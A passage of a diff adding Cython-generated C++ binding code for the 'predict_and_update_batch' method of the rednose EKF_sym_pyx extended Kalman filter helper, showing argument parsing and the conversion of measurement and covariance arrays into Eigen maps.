__Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_t)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 139, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_kind)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 139, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("predict_and_update_batch", 0, 4, 6, 1); __PYX_ERR(0, 139, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_z)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 139, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("predict_and_update_batch", 0, 4, 6, 2); __PYX_ERR(0, 139, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 3: + if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_R)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 139, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("predict_and_update_batch", 0, 4, 6, 3); __PYX_ERR(0, 139, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 4: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_extra_args); + if (value) { values[4] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 139, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 5: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_augment); + if (value) { values[5] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 139, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "predict_and_update_batch") < 0)) __PYX_ERR(0, 139, __pyx_L3_error) + } + } else { + switch (__pyx_nargs) { + case 6: values[5] = __Pyx_Arg_FASTCALL(__pyx_args, 5); + CYTHON_FALLTHROUGH; + case 5: values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); + CYTHON_FALLTHROUGH; + case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); + values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + break; + default: goto __pyx_L5_argtuple_error; + } + } + __pyx_v_t = __pyx_PyFloat_AsDouble(values[0]); if (unlikely((__pyx_v_t == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 139, __pyx_L3_error) + __pyx_v_kind = __Pyx_PyInt_As_int(values[1]); if (unlikely((__pyx_v_kind == (int)-1) && PyErr_Occurred())) __PYX_ERR(0, 139, __pyx_L3_error) + __pyx_v_z = values[2]; + __pyx_v_R = values[3]; + __pyx_v_extra_args = values[4]; + if (values[5]) { + __pyx_v_augment = __Pyx_PyObject_IsTrue(values[5]); if (unlikely((__pyx_v_augment == ((bool)-1)) && PyErr_Occurred())) __PYX_ERR(0, 139, __pyx_L3_error) + } else { + __pyx_v_augment = ((bool)0); + } + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("predict_and_update_batch", 0, 4, 6, __pyx_nargs); __PYX_ERR(0, 139, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("rednose.helpers.ekf_sym_pyx.EKF_sym_pyx.predict_and_update_batch", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_18predict_and_update_batch(((struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *)__pyx_v_self), __pyx_v_t, __pyx_v_kind, __pyx_v_z, __pyx_v_R, __pyx_v_extra_args, __pyx_v_augment); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_18predict_and_update_batch(struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *__pyx_v_self, double __pyx_v_t, int __pyx_v_kind, PyObject *__pyx_v_z, PyObject *__pyx_v_R, PyObject *__pyx_v_extra_args, bool __pyx_v_augment) { + std::vector> __pyx_v_z_map; + PyArrayObject *__pyx_v_zi_b = 0; + PyObject *__pyx_v_zi = NULL; + std::vector >> __pyx_v_R_map; + PyArrayObject *__pyx_v_Ri_b = 0; + PyObject *__pyx_v_Ri = NULL; + std::vector > __pyx_v_extra_args_map; + std::vector __pyx_v_args_map; + PyObject *__pyx_v_args = NULL; + PyObject *__pyx_v_a = NULL; + std::optional __pyx_v_res; + Eigen::VectorXd __pyx_8genexpr1__pyx_v_tmpvec; + __Pyx_LocalBuf_ND __pyx_pybuffernd_Ri_b; + __Pyx_Buffer __pyx_pybuffer_Ri_b; + __Pyx_LocalBuf_ND __pyx_pybuffernd_zi_b; + __Pyx_Buffer __pyx_pybuffer_zi_b; + PyObject *__pyx_r = NULL; + __Pyx_TraceDeclarations + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + Py_ssize_t __pyx_t_2; + PyObject *(*__pyx_t_3)(PyObject *); + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + PyObject *__pyx_t_8 = NULL; + PyArrayObject *__pyx_t_9 = NULL; + int __pyx_t_10; + PyObject *__pyx_t_11 = NULL; + PyObject *__pyx_t_12 = NULL; + PyObject *__pyx_t_13 = NULL; + char *__pyx_t_14; + PyArrayObject *__pyx_t_15 = NULL; + int __pyx_t_16; + Py_ssize_t __pyx_t_17; + PyObject *(*__pyx_t_18)(PyObject *); + double __pyx_t_19; + int __pyx_t_20; + PyObject *__pyx_t_21 = NULL; + std::vector ::iterator __pyx_t_22; + std::vector __pyx_t_23; + Eigen::VectorXd __pyx_t_24; + PyObject *__pyx_t_25 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_TraceFrameInit(__pyx_codeobj__29) + __Pyx_RefNannySetupContext("predict_and_update_batch", 0); + __Pyx_TraceCall("predict_and_update_batch", __pyx_f[0], 139, 0, __PYX_ERR(0, 139, __pyx_L1_error)); + __pyx_pybuffer_zi_b.pybuffer.buf = NULL; + __pyx_pybuffer_zi_b.refcount = 0; + __pyx_pybuffernd_zi_b.data = NULL; + __pyx_pybuffernd_zi_b.rcbuffer = &__pyx_pybuffer_zi_b; + __pyx_pybuffer_Ri_b.pybuffer.buf = NULL; + __pyx_pybuffer_Ri_b.refcount = 0; + __pyx_pybuffernd_Ri_b.data = NULL; + __pyx_pybuffernd_Ri_b.rcbuffer = &__pyx_pybuffer_Ri_b; + + /* "rednose/helpers/ekf_sym_pyx.pyx":142 + * cdef vector[MapVectorXd] z_map + * cdef np.ndarray[np.float64_t, ndim=1, mode='c'] zi_b + * for zi in z: # <<<<<<<<<<<<<< + * zi_b = np.ascontiguousarray(zi, dtype=np.double) + * z_map.push_back(MapVectorXd( zi_b.data, zi.shape[0])) + */ + if (likely(PyList_CheckExact(__pyx_v_z)) || PyTuple_CheckExact(__pyx_v_z)) { + __pyx_t_1 = __pyx_v_z; __Pyx_INCREF(__pyx_t_1); __pyx_t_2 = 0; + __pyx_t_3 = NULL; + } else { + __pyx_t_2 = -1; __pyx_t_1 = PyObject_GetIter(__pyx_v_z); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 142, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 142, __pyx_L1_error) + } + for (;;) { + if (likely(!__pyx_t_3)) { + if (likely(PyList_CheckExact(__pyx_t_1))) { + if (__pyx_t_2 >= PyList_GET_SIZE(__pyx_t_1)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_4 = PyList_GET_ITEM(__pyx_t_1, __pyx_t_2); __Pyx_INCREF(__pyx_t_4); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(0, 142, __pyx_L1_error) + #else + __pyx_t_4 = PySequence_ITEM(__pyx_t_1, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 142, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + #endif + } else { + if (__pyx_t_2 >= PyTuple_GET_SIZE(__pyx_t_1)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_4 = PyTuple_GET_ITEM(__pyx_t_1, __pyx_t_2); __Pyx_INCREF(__pyx_t_4); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(0, 142, __pyx_L1_error) + #else + __pyx_t_4 = PySequence_ITEM(__pyx_t_1, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 142, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + #endif + } + } else { + __pyx_t_4 = __pyx_t_3(__pyx_t_1); + if (unlikely(!__pyx_t_4)) { + PyObject* exc_type = PyErr_Occurred(); + if (exc_type) { + if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); + else __PYX_ERR(0, 142, __pyx_L1_error) + } + break; + } + __Pyx_GOTREF(__pyx_t_4); + } + __Pyx_XDECREF_SET(__pyx_v_zi, __pyx_t_4); + __pyx_t_4 = 0; + + /* "rednose/helpers/ekf_sym_pyx.pyx":143 + * cdef np.ndarray[np.float64_t, ndim=1, mode='c'] zi_b + * for zi in z: + * zi_b = np.ascontiguousarray(zi, dtype=np.double) # <<<<<<<<<<<<<< + * z_map.push_back(MapVectorXd( zi_b.data, zi.shape[0])) + * + */ + __Pyx_GetModuleGlobalName(__pyx_t_4, __pyx_n_s_np); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 143, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_t_4, __pyx_n_s_ascontiguousarray); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 143, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_4 = PyTuple_New(1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 143, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_INCREF(__pyx_v_zi); + __Pyx_GIVEREF(__pyx_v_zi); + PyTuple_SET_ITEM(__pyx_t_4, 0, __pyx_v_zi); + __pyx_t_6 = __Pyx_PyDict_NewPresized(1); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 143, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_GetModuleGlobalName(__pyx_t_7, __pyx_n_s_np); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 143, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __pyx_t_8 = __Pyx_PyObject_GetAttrStr(__pyx_t_7, __pyx_n_s_double); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 143, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + if (PyDict_SetItem(__pyx_t_6, __pyx_n_s_dtype, __pyx_t_8) < 0) __PYX_ERR(0, 143, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + __pyx_t_8 = __Pyx_PyObject_Call(__pyx_t_5, __pyx_t_4, __pyx_t_6); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 143, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + if (!(likely(((__pyx_t_8) == Py_None) || likely(__Pyx_TypeTest(__pyx_t_8, __pyx_ptype_5numpy_ndarray))))) __PYX_ERR(0, 143, __pyx_L1_error) + __pyx_t_9 = ((PyArrayObject *)__pyx_t_8); + { + __Pyx_BufFmt_StackElem __pyx_stack[1]; + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_zi_b.rcbuffer->pybuffer); + __pyx_t_10 = __Pyx_GetBufferAndValidate(&__pyx_pybuffernd_zi_b.rcbuffer->pybuffer, (PyObject*)__pyx_t_9, &__Pyx_TypeInfo_nn___pyx_t_5numpy_float64_t, PyBUF_FORMAT| PyBUF_C_CONTIGUOUS, 1, 0, __pyx_stack); + if (unlikely(__pyx_t_10 < 0)) { + PyErr_Fetch(&__pyx_t_11, &__pyx_t_12, &__pyx_t_13); + if (unlikely(__Pyx_GetBufferAndValidate(&__pyx_pybuffernd_zi_b.rcbuffer->pybuffer, (PyObject*)__pyx_v_zi_b, &__Pyx_TypeInfo_nn___pyx_t_5numpy_float64_t, PyBUF_FORMAT| PyBUF_C_CONTIGUOUS, 1, 0, __pyx_stack) == -1)) { + Py_XDECREF(__pyx_t_11); Py_XDECREF(__pyx_t_12); Py_XDECREF(__pyx_t_13); + __Pyx_RaiseBufferFallbackError(); + } else { + PyErr_Restore(__pyx_t_11, __pyx_t_12, __pyx_t_13); + } + __pyx_t_11 = __pyx_t_12 = __pyx_t_13 = 0; + } + __pyx_pybuffernd_zi_b.diminfo[0].strides = __pyx_pybuffernd_zi_b.rcbuffer->pybuffer.strides[0]; __pyx_pybuffernd_zi_b.diminfo[0].shape = __pyx_pybuffernd_zi_b.rcbuffer->pybuffer.shape[0]; + if (unlikely((__pyx_t_10 < 0))) __PYX_ERR(0, 143, __pyx_L1_error) + } + __pyx_t_9 = 0; + __Pyx_XDECREF_SET(__pyx_v_zi_b, ((PyArrayObject *)__pyx_t_8)); + __pyx_t_8 = 0; + + /* "rednose/helpers/ekf_sym_pyx.pyx":144 + * for zi in z: + * zi_b = np.ascontiguousarray(zi, dtype=np.double) + * z_map.push_back(MapVectorXd( zi_b.data, zi.shape[0])) # <<<<<<<<<<<<<< + * + * cdef vector[MapMatrixXdr] R_map + */ + __pyx_t_14 = __pyx_f_5numpy_7ndarray_4data_data(((PyArrayObject *)__pyx_v_zi_b)); if (unlikely(__pyx_t_14 == ((char *)NULL) && PyErr_Occurred())) __PYX_ERR(0, 144, __pyx_L1_error) + __pyx_t_8 = __Pyx_PyObject_GetAttrStr(__pyx_v_zi, __pyx_n_s_shape); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 144, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __pyx_t_6 = __Pyx_GetItemInt(__pyx_t_8, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 144, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + __pyx_t_10 = __Pyx_PyInt_As_int(__pyx_t_6); if (unlikely((__pyx_t_10 == (int)-1) && PyErr_Occurred())) __PYX_ERR(0, 144, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + try { + __pyx_v_z_map.push_back(Eigen::Map(((double *)__pyx_t_14), __pyx_t_10)); + } catch(...) { + __Pyx_CppExn2PyErr(); + __PYX_ERR(0, 144, __pyx_L1_error) + } + + /* "rednose/helpers/ekf_sym_pyx.pyx":142 + * cdef vector[MapVectorXd] z_map + * cdef np.ndarray[np.float64_t, ndim=1, mode='c'] zi_b + * for zi in z: # <<<<<<<<<<<<<< + * zi_b = np.ascontiguousarray(zi, dtype=np.double) + * z_map.push_back(MapVectorXd( zi_b.data, zi.shape[0])) + */ + } + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "rednose/helpers/ekf_sym_pyx.pyx":148 + * cdef vector[MapMatrixXdr] R_map + * cdef np.ndarray[np.float64_t, ndim=2, mode='c'] Ri_b + * for Ri in R: # <<<<<<<<<<<<<< + * Ri_b = np.ascontiguousarray(Ri, dtype=np.double) + * R_map.push_back(MapMatrixXdr( Ri_b.data, Ri.shape[0], Ri.shape[1])) + */ + if (likely(PyList_CheckExact(__pyx_v_R)) || PyTuple_CheckExact(__pyx_v_R)) { + __pyx_t_1 = __pyx_v_R; __Pyx_INCREF(__pyx_t_1); __pyx_t_2 = 0; + __pyx_t_3 = NULL; + } else { + __pyx_t_2 = -1; __pyx_t_1 = PyObject_GetIter(__pyx_v_R); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 148, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 148, __pyx_L1_error) + } + for (;;) { + if (likely(!__pyx_t_3)) { + if (likely(PyList_CheckExact(__pyx_t_1))) { + if (__pyx_t_2 >= PyList_GET_SIZE(__pyx_t_1)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_6 = PyList_GET_ITEM(__pyx_t_1, __pyx_t_2); __Pyx_INCREF(__pyx_t_6); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(0, 148, __pyx_L1_error) + #else + __pyx_t_6 = PySequence_ITEM(__pyx_t_1, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 148, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + #endif + } else { + if (__pyx_t_2 >= PyTuple_GET_SIZE(__pyx_t_1)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_6 = PyTuple_GET_ITEM(__pyx_t_1, __pyx_t_2); __Pyx_INCREF(__pyx_t_6); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(0, 148, __pyx_L1_error) + #else + __pyx_t_6 = PySequence_ITEM(__pyx_t_1, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 148, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + #endif + } + } else { + __pyx_t_6 = __pyx_t_3(__pyx_t_1); + if (unlikely(!__pyx_t_6)) { + PyObject* exc_type = PyErr_Occurred(); + if (exc_type) { + if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); + else __PYX_ERR(0, 148, __pyx_L1_error) + } + break; + } + __Pyx_GOTREF(__pyx_t_6); + } + __Pyx_XDECREF_SET(__pyx_v_Ri, __pyx_t_6); + __pyx_t_6 = 0; + + /* "rednose/helpers/ekf_sym_pyx.pyx":149 + * cdef np.ndarray[np.float64_t, ndim=2, mode='c'] Ri_b + * for Ri in R: + * Ri_b = np.ascontiguousarray(Ri, dtype=np.double) # <<<<<<<<<<<<<< + * R_map.push_back(MapMatrixXdr( Ri_b.data, Ri.shape[0], Ri.shape[1])) + * + */ + __Pyx_GetModuleGlobalName(__pyx_t_6, __pyx_n_s_np); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 149, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_8 = __Pyx_PyObject_GetAttrStr(__pyx_t_6, __pyx_n_s_ascontiguousarray); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 149, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __pyx_t_6 = PyTuple_New(1); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 149, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_INCREF(__pyx_v_Ri); + __Pyx_GIVEREF(__pyx_v_Ri); + PyTuple_SET_ITEM(__pyx_t_6, 0, __pyx_v_Ri); + __pyx_t_4 = __Pyx_PyDict_NewPresized(1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 149, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_GetModuleGlobalName(__pyx_t_5, __pyx_n_s_np); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 149, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_7 = __Pyx_PyObject_GetAttrStr(__pyx_t_5, __pyx_n_s_double); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 149, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (PyDict_SetItem(__pyx_t_4, __pyx_n_s_dtype, __pyx_t_7) < 0) __PYX_ERR(0, 149, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + __pyx_t_7 = __Pyx_PyObject_Call(__pyx_t_8, __pyx_t_6, __pyx_t_4); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 149, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + if (!(likely(((__pyx_t_7) == Py_None) || likely(__Pyx_TypeTest(__pyx_t_7, __pyx_ptype_5numpy_ndarray))))) __PYX_ERR(0, 149, __pyx_L1_error) + __pyx_t_15 = ((PyArrayObject *)__pyx_t_7); + { + __Pyx_BufFmt_StackElem __pyx_stack[1]; + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_Ri_b.rcbuffer->pybuffer); + __pyx_t_10 = __Pyx_GetBufferAndValidate(&__pyx_pybuffernd_Ri_b.rcbuffer->pybuffer, (PyObject*)__pyx_t_15, &__Pyx_TypeInfo_nn___pyx_t_5numpy_float64_t, PyBUF_FORMAT| PyBUF_C_CONTIGUOUS, 2, 0, __pyx_stack); + if (unlikely(__pyx_t_10 < 0)) { + PyErr_Fetch(&__pyx_t_13, &__pyx_t_12, &__pyx_t_11); + if (unlikely(__Pyx_GetBufferAndValidate(&__pyx_pybuffernd_Ri_b.rcbuffer->pybuffer, (PyObject*)__pyx_v_Ri_b, &__Pyx_TypeInfo_nn___pyx_t_5numpy_float64_t, PyBUF_FORMAT| PyBUF_C_CONTIGUOUS, 2, 0, __pyx_stack) == -1)) { + Py_XDECREF(__pyx_t_13); Py_XDECREF(__pyx_t_12); Py_XDECREF(__pyx_t_11); + __Pyx_RaiseBufferFallbackError(); + } else { + PyErr_Restore(__pyx_t_13, __pyx_t_12, __pyx_t_11); + } + __pyx_t_13 = __pyx_t_12 = __pyx_t_11 = 0; + } + __pyx_pybuffernd_Ri_b.diminfo[0].strides = __pyx_pybuffernd_Ri_b.rcbuffer->pybuffer.strides[0]; __pyx_pybuffernd_Ri_b.diminfo[0].shape = __pyx_pybuffernd_Ri_b.rcbuffer->pybuffer.shape[0]; __pyx_pybuffernd_Ri_b.diminfo[1].strides = __pyx_pybuffernd_Ri_b.rcbuffer->pybuffer.strides[1]; __pyx_pybuffernd_Ri_b.diminfo[1].shape = __pyx_pybuffernd_Ri_b.rcbuffer->pybuffer.shape[1]; + if (unlikely((__pyx_t_10 < 0))) __PYX_ERR(0, 149, __pyx_L1_error) + } + __pyx_t_15 = 0; + __Pyx_XDECREF_SET(__pyx_v_Ri_b, ((PyArrayObject *)__pyx_t_7)); + __pyx_t_7 = 0; + + /* "rednose/helpers/ekf_sym_pyx.pyx":150 + * for Ri in R: + * Ri_b = np.ascontiguousarray(Ri, dtype=np.double) + * R_map.push_back(MapMatrixXdr( Ri_b.data, Ri.shape[0], Ri.shape[1])) # <<<<<<<<<<<<<< + * + * cdef vector[vector[double]] extra_args_map + */ + __pyx_t_14 = __pyx_f_5numpy_7ndarray_4data_data(((PyArrayObject *)__pyx_v_Ri_b)); if (unlikely(__pyx_t_14 == ((char *)NULL) && PyErr_Occurred())) __PYX_ERR(0, 150, __pyx_L1_error) + __pyx_t_7 = __Pyx_PyObject_GetAttrStr(__pyx_v_Ri, __pyx_n_s_shape); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 150, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __pyx_t_4 = __Pyx_GetItemInt(__pyx_t_7, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 150, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + __pyx_t_10 = __Pyx_PyInt_As_int(__pyx_t_4); if (unlikely((__pyx_t_10 == (int)-1) && PyErr_Occurred())) __PYX_ERR(0, 150, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_4 = __Pyx_PyObject_GetAttrStr(__pyx_v_Ri, __pyx_n_s_shape); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 150, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_7 = __Pyx_GetItemInt(__pyx_t_4, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 150, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_16 = __Pyx_PyInt_As_int(__pyx_t_7); if (unlikely((__pyx_t_16 == (int)-1) && PyErr_Occurred())) __PYX_ERR(0, 150, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + try { + __pyx_v_R_map.push_back(Eigen::Map >(((double *)__pyx_t_14), __pyx_t_10, __pyx_t_16)); + } catch(...) { + __Pyx_CppExn2PyErr(); + __PYX_ERR(0, 150, __pyx_L1_error) + } + + /* "rednose/helpers/ekf_sym_pyx.pyx":148 + * cdef vector[MapMatrixXdr] R_map + * cdef np.ndarray[np.float64_t, ndim=2, mode='c'] Ri_b + * for Ri in R: # <<<<<<<<<<<<<< + * Ri_b = np.ascontiguousarray(Ri, dtype=np.double) + * R_map.push_back(MapMatrixXdr( Ri_b.data, Ri.shape[0], Ri.shape[1])) + */ + } + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "rednose/helpers/ekf_sym_pyx.pyx":154 + * cdef vector[vector[double]] extra_args_map + * cdef vector[double] args_map + * for args in extra_args: # <<<<<<<<<<<<<< + * args_map.clear() + * for a in args: + */ + if (likely(PyList_CheckExact(__pyx_v_extra_args)) || PyTuple_CheckExact(__pyx_v_extra_args)) { + __pyx_t_1 = __pyx_v_extra_args; __Pyx_INCREF(__pyx_t_1); __pyx_t_2 = 0; + __pyx_t_3 = NULL; + } else { + __pyx_t_2 = -1; __pyx_t_1 = PyObject_GetIter(__pyx_v_extra_args); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 154, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 154, __pyx_L1_error) + } + for (;;) { + if (likely(!__pyx_t_3)) { + if (likely(PyList_CheckExact(__pyx_t_1))) { + if (__pyx_t_2 >= PyList_GET_SIZE(__pyx_t_1)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_7 = PyList_GET_ITEM(__pyx_t_1, __pyx_t_2); __Pyx_INCREF(__pyx_t_7); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(0, 154, __pyx_L1_error) + #else + __pyx_t_7 = PySequence_ITEM(__pyx_t_1, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 154, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + #endif + } else { + if (__pyx_t_2 >= PyTuple_GET_SIZE(__pyx_t_1)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_7 = PyTuple_GET_ITEM(__pyx_t_1, __pyx_t_2); __Pyx_INCREF(__pyx_t_7); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(0, 154, __pyx_L1_error) + #else + __pyx_t_7 = PySequence_ITEM(__pyx_t_1, __pyx_t_2); __pyx_t_2++; if 